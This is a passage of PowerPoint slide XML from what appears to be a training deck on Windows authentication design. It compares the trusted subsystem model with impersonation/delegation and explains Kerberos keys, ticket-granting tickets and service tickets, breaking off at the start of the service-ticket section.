          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3237844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noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30354824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Impersonation / Delegation vs. Trusted Subsystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you design the authentication that you require in your application, consider whether to use impersonation to use the original caller's identity for access to back-end resources, or whether to use the trusted subsystem model, where the Web or application server is responsible for authenticating users and the server then uses a service identity to access back-end resources. The two techniques have different advantages and disadvantages as explained in the following subsections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Trusted Subsystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A trusted subsystem model is where the database server trusts the Web application identity. The Web application identity is trusted to make calls on behalf of the original caller.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Trusted Subsystem Advantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The advantages of the trusted subsystem model include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scalability.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The trusted subsystem model supports efficient connection pooling. Connection pooling allows multiple clients to reuse available pooled connections. Connection pooling works with this model because all back-end resources accessed use the security context of the application's service account, regardless of the caller's identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Minimal back-end ACL management.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Only the service account accesses back-end resources (for example, databases). ACLs are configured for this single identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>No direct data access.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> In the trusted subsystem model, only the service account is granted access to the back-end resources. As a result, users cannot directly access back-end data without going through the application (and being subjected to application authorization).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Trusted Subsystem Disadvantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The trusted subsystem model has the following disadvantages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Auditing.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> To perform auditing at the back end, you can explicitly pass (at the application level) the identity of the original caller to the back end, and have the auditing performed there. With this approach, you have to trust the middle tier and you have a potential repudiation risk. Alternatively, you can generate an audit trail in the middle tier, and then correlate it with back-end audit trails. To use this approach, you must ensure that the server clocks are synchronized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Increased risk from server compromise.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> In the trusted subsystem model, the middle-tier service is granted broad access to back-end resources. As a result, a compromised middle-tier service could make it easier for an attacker to gain broad access to back-end resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Impersonation / Delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The impersonation and delegation model also has advantages and disadvantages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Impersonation / Delegation Advantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The advantages of the impersonation / delegation model include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Auditing.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> You benefit from operating system auditing. This allows administrators to track which users have attempted to access specific resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Auditing across tiers.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The user's security context is maintained across the physical tiers of your application, which allows administrators to audit across tiers. Generally, auditing is considered most authoritative if the audits are generated at the precise time of resource access and by the same routines that access the resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Granular access controls.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> You can configure granular access in the database. You can restrict individual user accounts independently of one another in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Impersonation / Delegation Disadvantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The disadvantages of the impersonation / delegation model include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scalability. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The impersonation / delegation model does not allow you to make efficient use of database connection pooling because database access is performed by using connections that are tied to the individual security contexts of the original callers. This significantly limits the application's ability to scale to large numbers of users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Increased administration effort.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ACLs on back-end resources need to be maintained in such a way that each user is granted the appropriate level of access. When the number of back-end resources increases (and the number of users increases), a significant administration effort is required to manage ACLs.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="523365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709423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algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why are keys needed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos protocol relies heavily on an authentication technique involving shared-secret keys. The basic shared-secret concept is quite simple: If a secret is known by only two people, then either person can verify the identity of the other by confirming that the other person knows the secret.</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For example, suppose that Alice often sends messages to Bob, and that Bob needs to ensure that a message from Alice really has come from Alice before he acts on its information. They decide to solve their problem by selecting a password and agreeing to share the secret password between the two of them, but not with anyone else. If a message purported to be from Alice can somehow demonstrate that the sender knows the password, Bob can verify that the sender is indeed Alice.</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only question left for Alice and Bob to resolve is how Alice will show that she knows the password. She could include it somewhere in her messages, perhaps in a signature block at the end—Alice, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Our$ecret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. This would be simple and efficient and would be effective if Alice and Bob could be sure that no one else is reading their mail. Unfortunately, their messages pass over a network used by people like Carol, who uses a network analyzer to scan traffic in hope that one day she might spot a password. Thus, Alice must not prove that she knows the secret by including it in her message. To keep the password secret, she must show that she knows it without revealing it.</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Kerberos protocol solves this problem with secret key cryptography. Instead of sharing a password, communication partners share a cryptographic key, and they use knowledge of this key to verify one another's identity. In order for the technique to work, the shared key must be symmetric—that is, a single key must be capable of both encryption and decryption. One party proves knowledge of the key by encrypting a piece of information; the other proves knowledge of the key by decrypting the information.</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Kerberos authentication relies on several keys and key types for encryption. Key types can include long-term symmetric keys, long-term asymmetric keys, and short-term symmetric keys. The authentication protocol was designed to use symmetric encryption, meaning that the same shared key is used by the sender and the recipient for encryption and decryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Long-Term Symmetric Keys: User, System, Service, and Inter-realm Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The long-term symmetric keys are derived from a password. The plaintext password is transformed into a cryptographic key by passing the text of the password through a cryptographic function. (All implementations of the Kerberos version 5 authentication protocol must support DES-CBC-MD5. Other algorithms are permissible.) The result of the cryptographic function is the key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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User keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>When a user is created, the password is used to create the user key. In Active Directory domains, the user key is stored with the user's object in the Active Directory. At the workstation, the user key is created when the user logs on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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System keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>When a workstation or a server joins a Windows domain, it receives a password. In the same manner as a user account, the system account's password is used to create the system key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Service keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Services use a key based on the account password they use to log on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>All KDCs in the same realm use the same service key. This key is based on the password assigned to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> account. Every Active Directory domain will have this built-in account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Inter-realm keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In order for cross-realm authentication to occur, the KDCs must share an inter-realm key. The realms can then trust each other because they share the key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Active Directory domains that have a parent-child relationship share an inter-realm key. This inter-realm key is the basis of transitive trusts in Windows 2000 and Windows Server 2003. If a shortcut trust is created, the two domains will exchange a key specifically for their trust.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Kerberos SSP encryption key lengths </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos SSP supports different encryption types and key lengths depending on the task to be completed and the options specified. Although the size of the key determines the degree of protection the key provides, key size does not significantly impact the size of the ticket. The following table lists the key lengths that Kerberos SSP supports for the various types of encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Key Lengths for Encryption Types</a:t>
            </a:r>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RC4-HMAC = 128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DES-CBC-CRC = 56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DES-CBC-MD5 = 56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Long-Term Asymmetric Keys: Public Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Currently, public-key certificates stored on smart cards are the only long-term asymmetric keys in the Microsoft implementation of Kerberos authentication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Short-Term Symmetric Keys: Session Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The session keys used for ticket-granting tickets (TGTs) and service tickets are short-lived and used only as long as that session or service ticket is valid.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405824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kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The main component of Kerberos authentication is the ticket. The Kerberos messages are used to request and deliver tickets. There are two types of tickets used in Kerberos authentication, TGTs and service tickets.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kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos Ticket Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos client sends ticket requests to the KDC:</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kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>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sz="900" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TGT requests are for the Authentication service, service ticket requests for the Ticket-granting service</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kern="1200" noProof="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ticket requests include:</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Requested properties (flags), such as whether the ticket is renewable.</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Requested encryption method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ticket-Granting Tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC responds to a client's authentication service request by returning a service ticket for itself. This special service ticket is called a ticket-granting ticket (TGT). A TGT enables the authentication service to safely transport the requester's credentials to the ticket-granting service.</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A TGT is:</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A user's initial ticket from the authentication service.</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Used to request service tickets.</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Meant only for use by the ticket-granting service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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TGTs are encrypted with a key shared by the KDCs. The client cannot read tickets. Only KDC servers can read TGTs to secure access to user credentials, session keys, and other information. Like an ordinary service ticket, a TGT contains a copy of the session key that the service (in this case the KDC) will use in communicating with the client. The TGT is encrypted with the KDC's long-term key.</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From the client's point of view, a TGT is just another ticket. Before it attempts to connect to any service, the client first checks its credentials cache for a service ticket to that service. If it does not have one, it checks the cache again for a TGT. If it finds a TGT, the client fetches the corresponding TGS session key from the cache, uses this key to prepare an authenticator (described later in this document), and sends both the authenticator and the TGT to the KDC, along with a request for a service ticket for the service. In other words, gaining admission to the KDC is no different from gaining admission to any other service in the domain—it requires a session key, an authenticator, and a ticket.</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From the KDC's point of view, TGTs enable it to avoid the performance penalties of looking up a user's long term key every time the user requests a service. The KDC looks up the user's long-term key only once, when it grants an initial TGT. For all other exchanges with this client, the KDC can decrypt the TGT with its own long-term key, extract the session key, and use that to validate the client's authenticator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Service tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
